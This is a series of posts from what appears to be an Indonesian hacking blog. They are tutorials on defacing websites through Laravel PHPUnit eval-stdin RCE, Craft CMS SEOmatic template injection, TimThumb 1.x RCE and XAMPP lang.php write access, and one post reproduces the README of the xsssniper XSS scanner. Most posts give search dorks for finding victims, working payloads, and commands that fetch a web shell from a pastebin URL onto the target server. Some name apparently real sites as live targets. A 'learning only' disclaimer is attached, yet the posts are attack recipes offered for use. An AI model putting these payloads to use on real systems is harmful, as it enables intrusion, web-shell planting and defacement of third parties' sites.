Senin, 27 Juli 2020

Apa Itu RCE (Remote Code Execution) dan apa dampak pada bug ini ?

Hallo ^_^ kali ini saya akan share tentang Apa itu RCE (Remote Code Execution) dan apa dampak pada bug ini ?



Apa itu RCE (Remote Code Execution)


RCE (Remote Command Injection) adalah Dimana penyerang dapat memerintah sistem untuk menjalankan kode yang dinginkan,
Tipe attack seperti ini biasanya karena kurangnya validasi terhadap data yang bisa dikendalikan oleh user.

Apa dampak RCE (Remote Code Execution)


Seorang penyerang yang mampu mengeksekusi cacat seperti itu biasanya dapat mengeksekusi perintah dengan hak istimewa dari bahasa pemrograman atau server web.
Pada banyak bahasa dia dapat mengeluarkan perintah sistem, menulis, menghapus atau membaca file atau terhubung ke database.

Mungkin sekian dulu dari saya mengenai artikel tentang Apa itu RCE (Remote Code Execution) dan apa dampak pada bug ini.

NOTE: "Semua artikel tutorial di blog ini hanya untuk sebatas Pembelajaran dan Pengetahuan saja, jika kalian meyalahgunakan tutorial di blog ini, itu bukan tanggung jawab saya."

Minggu, 26 Juli 2020

Exploit Laravel PHPUnit RCE ( Remote Code Execution )

Hallo ^_^  kali ini saya akan share tutorial poc cara deface dengan Exploit Laravel PHPUnit RCE ( Remote Code Execution )


Pertama Dorking dulu dengan dork dibawah in bro

DORK :

inurl:/vendor/phpunit/phpunit/src
inurl:/phpunit/src/Util/PHP/

Exploit  : 

/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php

Ok ku anggap kalian sudah punya tagetnya, langsung saja kita exploitnya seperti ini
Disini kalian bebas untuk mengirim datanya menggunakan Burp Suite, Postman, atau curl pun bisa.
Disini saya menggunakan curl untuk mengirimkan datanya karena simple dan tidak ribet hehe.
Untuk penggunaanya cukup gunakan parameter -d atau --data

Payload yang bisa digunakan :

<?php echo php_uname(); ?>
<?php echo system('id'); ?>

Contoh command

curl -d "<?php echo php_uname(); ?>" http://taget.com/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php


Kalau ingin Upload Shell tinggal ubah payloadnya menjadi seperti ini :

<?php system('wget https://pastebin.com/raw/i7VyUpWu -O zero.php'; ?>


Setelah itu buka access Shell kalian di 

http://taget.com/vendor/phpunit/phpunit/src/Util/PHP/zero.php


Mungkin sekian dulu dari saya mengenai artikel tentang tutorial poc cara deface dengan Exploit Laravel PHPUnit RCE ( Remote Code Execution )

NOTE: "Semua artikel tutorial di blog ini hanya untuk sebatas Pembelajaran dan Pengetahuan saja, jika kalian meyalahgunakan tutorial di blog ini, itu bukan tanggung jawab saya."


Tag : phpunit rce, laravel phpunit rce, laravel framework phpunit rce exploit, laravel rce, laravel phpunit remote code execution


Kamis, 23 Juli 2020

Cara Deface Dengan Exploit SSTI ( Server Side Template Injection )

Hello para hacker, kali ini saya akan share tutorial Cara Deface Dengan Exploit SSTI ( Server Side Template Injection )




Pertama dorking dulu dengan dork ini bro

inurl:/humans.txt intext:"Craft CMS"
intext:SEOmatic filetype:txt
site:*/humans.txt intext:SEOmatic
/* TEAM */ inurl:/humans.txt

Exploit :

/actions/seomatic/meta-container/all-meta-containers?uri=

ok ku anggap kalian dah punya targetnya langsung saja kita exploit targetnya seperti ini

jika vuln akan tampil seperti ini


Nah Sudah Menemukan Website Yang Vuln? Selanjutnya Kita Melakukan upload shell dengan RCE Atau Remote Code Excution.

https://site.com/actions/seomatic/meta-container/all-meta-containers?uri={{craft.app.view.evaluateDynamicContent(%27print(system(%22curl\x20https://pastebin.com/raw/i7VyUpWu\x20%3E\x20zero.php%22));%27)}} 

Nah Seperti Ini Kalian Bisa Mengubah Link Pastebin dan Juga extensi Shell kalian Sesuai Selera Masing Masing.

Setelah itu buka acesss Shell kalian di

https://site.com/zero.php

Mungkin sekian dulu dari saya mengenai artikel tutorial Cara Deface Dengan Exploit SSTI ( Server Side Template Injection )

NOTE: "Semua artikel tutorial di blog ini hanya untuk sebatas Pembelajaran dan Pengetahuan saja, jika kalian meyalahgunakan tutorial di blog ini, itu bukan tanggung jawab saya."


Tag : SSTI, Server Side Template Injection, SSTI TO RCE, SSTI PAYLOAD, Server side template injection tutorial, Server side template injection payload, Server side template injection exploit.

Selasa, 28 Januari 2020

XSSSNIPER An automatic XSS discovery tool

XSSSNIPER




xsssniper adalah alat penemuan xss yang berguna dengan fungsi pemindaian massal.

Apa yang dilakukannya adalah memindai URL target untuk parameter GET dan kemudian menyuntikkan muatan XSS (Y) ke dalamnya dan mengurai respons untuk artefak injeksi (Z).
Contoh paling sederhana adalah dengan menyuntikkan <script type = "text / javascript"> window.alert ('lol') </script> dan periksa <script type = "text / javascript"> window.alert ('lol') </script>, jika kami memiliki kecocokan mungkin kami baru saja menemukan XSS.

Jika tidak ada pemeriksaan yang ditentukan, xssniper akan mempertimbangkan muatan dan memeriksa yang sama.

Jika tidak ada payload yang ditentukan juga file khusus akan diuraikan untuk payload umum (lib / payloads.xml, silakan berkontribusi!).

Fitur lain yang bermanfaat adalah kemampuan untuk merayapi URL target untuk tautan relatif. Setiap tautan yang ditemukan ditambahkan ke antrian pemindaian dan diproses, sehingga lebih mudah untuk menguji keseluruhan situs web.

Pada akhirnya, metode ini bukan bukti yang terkecoh, tetapi heuristik yang baik untuk menemukan titik injeksi secara massal dan menguji strategi pelarian. Juga karena tidak ada emulasi browser adalah tugas Anda untuk menguji secara manual injeksi yang ditemukan terhadap berbagai perlindungan xss browser.

Download

git clone https://github.com/gbrindisi/xsssniper.git

Usage

Usage: xsssniper.py [options]

Options:
  -h, --help            show this help message and exit
  -u URL, --url=URL     target URL
  --post                try a post request to target url
  --data=POST_DATA      post data to use
  --threads=THREADS     number of threads
  --http-proxy=HTTP_PROXY
                        scan behind given proxy (format: 127.0.0.1:80)
  --tor                 scan behind default Tor
  --crawl               crawl target url for other links to test
  --forms               crawl target url looking for forms to test
  --user-agent=USER_AGENT
                        provide an user agent
  --random-agent        perform scan with random user agents
  --cookie=COOKIE       use a cookie to perform scans
  --dom                 basic heuristic to detect dom xss

Examples:

Scanning a single url with GET params:
$ python xsssniper.py -u "http://target.com/index.php?page=test"
Scanning a single url with POST params:
$ python xsssniper.py -u "http://target.com/index.php" --post --data=POST_DATA
Crawl a single url looking for forms to scan:
$ python xsssniper.py -u "http://target.com" --forms
Mass scan an entire website:
$ python xsssniper.py -u "http://target.com" --crawl
Mass scan an entire website forms included:
$ python xsssniper.py -u "http://target.com" --crawl --forms 
Analyze target page javascripts (embedded and linked) to search for common sinks and sources:
$ python xsssniper.py -u "http://target.com" --dom 

Copyright (c) 2012, Gianluca Brindisi < g@brindi.si >
Source: https://github.com/gbrindisi/

Senin, 22 Oktober 2018

Cara deface dengan Exploit Timthumb V1.XX RCE

Hello ^^ kali ini saya akan share Cara deface dengan Exploit Timthumb V1.XX RCE
yuk langsung saja ke tutorialnya,


Dork : inurl:/timthumb.php 
atau bisa kalian pake dengan List Dork Timthumb V1.XX RCE disini
Exploit : timthumb.php?src=http://flickr.com.tukangpompajakarta.com/shell.php


Disini saya punya live targetnya => http://cityfordhcm.com/timthumb.php
Untuk ciri ciri web vuln rce timthumb seperti gambar dibawah ini .

jika sudah menemukan website yang seperti itu kita langsung saja exploit seperti ini 
http://cityfordhcm.com/timthumb.php?src=http://flickr.com.tukangpompajakarta.com/shell.php
nanti akan keluar seperti gambar dibawah ini atau seperti ini

Unable to open image : /home/cityfordhcm/public_html/cache/external_66b043a706b2265ea1b66330089ac2a0.php
Query String : src=http://flickr.com.tukangpompajakarta.com/shell.php
TimThumb version : 1.30


Untuk akses shell di timthumb bisa di liat di unable to open image  berati di http://cityfordhcm.com/cache/external_66b043a706b2265ea1b66330089ac2a0.php 
Setelah itu kalian buka http://cityfordhcm.com/cache/dedot.php untuk upload shell :D

Mungkin sekian dulu  dari saya mengenai artikel Cara deface dengan Exploit Timthumb V1.XX RCE semoga bermanfaat..

List Dork Timthumb V1.XX RCE

Hello ^^ kali ini saya akan share List Dork Timthumb V1.XX RCE .
untuk yang belum tau Cara deface dengan Exploit Timthumb V1.XX RCE  bisa kalian liat disini 



DORK Timthumb V1.XX RCE :




Mungkin sekian dulu  dari saya mengenai artikel List Dork Timthumb V1.XX RCE semoga bermanfaat.


Cara deface dengan XAMPP Local Write Access

Hello ^^ kali ini saya akan share Cara deface dengan XAMPP Local Write Access 
yuk langsung saja ke tutorialnya,


Dork :
inurl:/xampp/index.php intitle:XAMPP
inurl:/xampp/lang.php
inurl:/security/lang.php
inurl:/xampp/splash.php 

Exploit :
- localhost/xampp/lang.php?hacked_by_h0d3_g4n
- localhost/security/lang.php?hacked_by_
h0d3_g4n

Tutorial :

1. Cari targetnya pake Dork diatas.

2. Masukan salah satu exploitnya. contoh  
http://motasaindonesia.co.id/xampp/lang.php?hacked_by_h0d3_g4n

3. Ada notice seperti berikut. Abaikan saja :D . 




4. Lalu akses hasil defacenya. contoh http://www.motasaindonesia.co.id/xampp/lang.tmp



Mungkin sekian dulu  dari saya mengenai artikel Cara deface dengan XAMPP Local Write Access  semoga bermanfaat.